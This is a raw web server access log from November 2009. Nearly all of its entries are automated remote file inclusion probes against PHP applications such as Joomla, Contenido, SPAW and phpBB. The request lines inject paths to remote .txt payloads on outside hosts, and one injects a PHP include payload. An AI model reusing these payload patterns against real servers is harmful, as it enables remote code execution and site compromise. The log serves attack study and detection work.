67.205.103.171 - - [13/Nov/2009:01:32:38 -0500] "GET /logs/access_log.Q109051600//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:32:49 -0500] "GET /logs/access_log.Q109092200%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:32:49 -0500] "GET /logs/access_log.Q109071900%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:01:32:57 -0500] "GET /logs/access_log.Q109101500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:33:01 -0500] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.38.112.174 - - [13/Nov/2009:01:33:01 -0500] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:33:08 -0500] "GET /logs/access_log.Q109083100%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:33:08 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:33:08 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:33:29 -0500] "GET /logs/access_log.Q109091400%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:06 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:06 -0500] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:06 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:07 -0500] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:09 -0500] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:09 -0500] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:13 -0500] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:13 -0500] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:15 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:15 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:15 -0500] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:15 -0500] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:16 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:16 -0500] "GET /logs/access_log.Q109083100%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:16 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
174.143.126.121 - - [13/Nov/2009:01:34:19 -0500] "GET /logs/access_log.Q109092700//?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.126.121 - - [13/Nov/2009:01:34:19 -0500] "GET //?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.126.121 - - [13/Nov/2009:01:34:26 -0500] "GET /logs/access_log.Q109092700//?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
174.143.126.121 - - [13/Nov/2009:01:34:26 -0500] "GET //?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
174.143.126.121 - - [13/Nov/2009:01:34:26 -0500] "GET /logs//?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 25811 "-" "libwww-perl/5.805"
213.79.101.98 - - [13/Nov/2009:01:34:31 -0500] "GET /logs/access_log.Q109091400%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:41 -0500] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:41 -0500] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.143.126.121 - - [13/Nov/2009:01:34:42 -0500] "GET /logs/error_log.Q109092700//?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
174.143.126.121 - - [13/Nov/2009:01:34:45 -0500] "GET /logs/error_log.Q109092700//?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.86.49.6 - - [13/Nov/2009:01:34:50 -0500] "GET /logs/access_log.Q109062800////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.86.49.6 - - [13/Nov/2009:01:34:51 -0500] "GET ////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.79.101.98 - - [13/Nov/2009:01:34:54 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:54 -0500] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:34:54 -0500] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.143.126.121 - - [13/Nov/2009:01:34:54 -0500] "GET //?mosConfig_absolute_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:35:22 -0500] "GET /logs/access_log.Q109092200%20%20////index.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:01:35:22 -0500] "GET ////index.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:01:35:22 -0500] "GET /logs////index.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:01:35:51 -0500] "GET /logs/access_log.Q109061700%20%20////index.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:36:04 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.210.118.200 - - [13/Nov/2009:01:36:46 -0500] "GET //?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
67.210.118.200 - - [13/Nov/2009:01:36:47 -0500] "GET /logs/access_log.Q109092700//?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.833"
67.210.118.200 - - [13/Nov/2009:01:36:47 -0500] "GET /logs//?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 200 25811 "-" "libwww-perl/5.833"
67.210.118.200 - - [13/Nov/2009:01:36:48 -0500] "GET /logs/error_log.Q109092700//?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.833"
115.86.49.6 - - [13/Nov/2009:01:37:27 -0500] "GET /logs/access_log.Q109062800////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:01:37:28 -0500] "GET ////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:01:37:28 -0500] "GET /logs////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET /logs/access_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET /logs/access_log.Q109101700//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:37:33 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:38:01 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:38:06 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:38:08 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:38:08 -0500] "GET //include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:38:16 -0500] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.210.118.200 - - [13/Nov/2009:01:38:21 -0500] "GET /logs//?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 200 25811 "-" "libwww-perl/5.833"
67.210.118.200 - - [13/Nov/2009:01:38:22 -0500] "GET //?mosConfig_absolute_path=http://biosesang.com/bbs/icon/private/db.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.833"
219.254.35.13 - - [13/Nov/2009:01:38:23 -0500] "GET /logs/access_log.Q109081100%20%20///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:38:23 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt??? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:38:26 -0500] "GET /logs/access_log.Q109081100%20%20///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:38:26 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://nma.fileave.com/id1.txt?? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:38:34 -0500] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:38:41 -0500] "GET /logs/access_log.Q109080900//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:38:51 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:38:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:38:57 -0500] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:39:02 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:39:02 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:39:05 -0500] "GET /logs/access_log.Q109090400//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:40:01 -0500] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:01:40:01 -0500] "GET /logs/access_log.Q109051400/errors.php?error=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.174.0.17 - - [13/Nov/2009:01:40:01 -0500] "GET /logs/access_log.Q109092600/errors.php?error=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:40:08 -0500] "GET /logs/access_log.Q109090400%20%20//include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:01:40:25 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.79.101.98 - - [13/Nov/2009:01:40:29 -0500] "GET /logs/access_log.Q109083100//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:40:29 -0500] "GET /logs/access_log.Q109091400//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:01:40:37 -0500] "GET /logs/error_log.Q109070900/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:01:40:38 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:01:40:38 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
213.79.101.98 - - [13/Nov/2009:01:40:44 -0500] "GET /logs/access_log.Q109083100//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:40:44 -0500] "GET /logs/access_log.Q109091400//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
115.86.49.6 - - [13/Nov/2009:01:41:07 -0500] "GET ////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:01:42:00 -0500] "GET /logs/access_log.Q109062500////admin/spaw/spaw_control.class.php?spaw_root=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
82.98.136.21 - - [13/Nov/2009:01:42:01 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
82.98.136.21 - - [13/Nov/2009:01:42:01 -0500] "GET /logs/access_log.Q109062500%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
82.98.136.21 - - [13/Nov/2009:01:42:01 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:43:37 -0500] "GET /logs/access_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:38 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:38 -0500] "GET /logs/access_log.Q109091400//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:43:38 -0500] "GET /logs/access_log.Q109101700%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:38 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:50 -0500] "GET //////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 456 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:50 -0500] "GET /logs/access_log.Q109091400//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:43:50 -0500] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 25815 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:43:56 -0500] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:01:44:00 -0500] "GET /logs/access_log.Q109080900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://gosiup.co.kr/zboard/icon/com_sef/1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
78.110.54.243 - - [13/Nov/2009:01:44:48 -0500] "GET /logs/access_log.Q109081600//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
78.110.54.243 - - [13/Nov/2009:01:44:48 -0500] "GET //ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.110.54.243 - - [13/Nov/2009:01:44:48 -0500] "GET /logs//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.110.54.243 - - [13/Nov/2009:01:44:48 -0500] "GET /logs/access_log.Q109072400//ver3/bulletin//skin/pqbig_board_blue/error.php?dir=http://prety3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:45:12 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:45:12 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.217.226.100 - - [13/Nov/2009:01:45:12 -0500] "GET /logs/access_log.Q109082800%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.79.101.98 - - [13/Nov/2009:01:45:16 -0500] "GET /logs/access_log.Q109091400%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
